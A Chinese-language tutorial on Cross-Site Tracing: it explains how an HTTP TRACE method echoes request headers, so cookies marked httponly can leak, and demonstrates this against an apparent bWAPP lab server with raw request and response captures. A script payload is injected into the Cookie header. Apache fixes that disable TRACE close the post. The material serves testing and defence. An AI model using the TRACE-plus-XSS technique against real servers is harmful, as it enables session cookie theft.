XSS與httponly
正常情況下,客戶端腳本(如JS腳本)是可以通過document.cookie函數獲得,這樣如果有XSS跨站漏洞,cookie很容易被盜取。瀏覽器有一個安全策略,通過設置cookie的httponly屬性,這樣客戶端腳本就不能通過document.cookie訪問該cookie,即使有XSS漏洞,也不能盜取用戶cookie。這個時候就可以利用HTTP TRACE方法來獲取到用戶的cookie信息。
TRACE方法
TRACE作用:客戶端發起一個請求時,這個請求可能要穿過防火牆、代理、網關或其他一些應用程序。每個中間節點都可能會修改原始的 HTTP 請求。TRACE 方法允許客戶端在 最終將請求發送給服務器時,看看它變成了什么樣子。
下面就來看下允許TRACE方法的服務器,TRACE方法是如何工作的。
請求包:
TRACE http://10.20.40.95/bWAPP/bWAPP/xss_get.php?firstname=aaaa&lastname=aaa&form=submit HTTP/1.1 Host: 10.20.40.95 Connection: keep-alive Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3 Referer: http://10.20.40.95/bWAPP/bWAPP/xss_get.php?firstname=%3Cscript%3Ealert%281%29%3C%2Fscript%3E&lastname=aa&form=submit Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7 Cookie: UM_distinctid=16d6147443356c-0f39aedf637785-67e1b3f-144000-16d61474434806; CNZZDATA1261218610=72836639-1569293821-%7C1569293821; PHPSESSID=jo1tq7ivnljqoknds138igko97; security_level=2
響應包:
HTTP/1.1 200 OK Date: Fri, 29 Nov 2019 11:32:59 GMT Server: Apache/2.4.23 (Win32) OpenSSL/1.0.2j mod_fcgid/2.3.9 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html Content-Length: 819 TRACE /bWAPP/bWAPP/xss_get.php?firstname=aaaa&lastname=aaa&form=submit HTTP/1.1 Host: 10.20.40.95 Connection: keep-alive Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3 Referer: http://10.20.40.95/bWAPP/bWAPP/xss_get.php?firstname=%3Cscript%3Ealert%281%29%3C%2Fscript%3E&lastname=aa&form=submit Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7 Cookie: UM_distinctid=16d6147443356c-0f39aedf637785-67e1b3f-144000-16d61474434806; CNZZDATA1261218610=72836639-1569293821-%7C1569293821; PHPSESSID=jo1tq7ivnljqoknds138igko97; security_level=2
可以看到響應包 響應體中是原始請求報文,並且會下載一個php格式的文件,打開文件內容是原始請求報文。
漏洞概述
當服務器允許trace方法時,就可能存在跨站跟蹤攻擊。跨站跟蹤攻擊即CST攻擊,是一種利用XSS和HTTP TRACE功能來進行攻擊的方式。
漏洞驗證
一、首先通過抓包工具攔截請求,修改請求包中的請求方法和請求包中的任意一個字段,下面以Cookie字段為例,在Cookie中插入XSS代碼:
TRACE http://10.20.40.95/bWAPP/bWAPP/xss_get.php?firstname=aaaa&lastname=aaa&form=submit HTTP/1.1
Host: 10.20.40.95
Connection: keep-alive
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
Cookie: <script>alert("TRACE XSS")</script>
二、修改響應包中的Content-Type:message/http,改為Content-Type:text/html:
HTTP/1.1 200 OK
Date: Fri, 29 Nov 2019 11:50:49 GMT
Server: Apache/2.4.23 (Win32) OpenSSL/1.0.2j mod_fcgid/2.3.9
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 570
TRACE /bWAPP/bWAPP/xss_get.php?firstname=aaaa&lastname=aaa&form=submit HTTP/1.1
Host: 10.20.40.95
Connection: keep-alive
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
Cookie: <script>alert("TRACE XSS")</script>
發送請求后頁面就會彈窗了。
修復建議
Apache服務器:
虛擬主機可以在.htaccess文件中添加如下代碼過濾TRACE請求:
RewriteEngine on
RewriteCond %{REQUEST_METHOD} ^(TRACE|TRACK)
RewriteRule .* - [F]
服務器用戶在httpd.conf尾部添加如下指令后,重啟apache即可:
TraceEnable off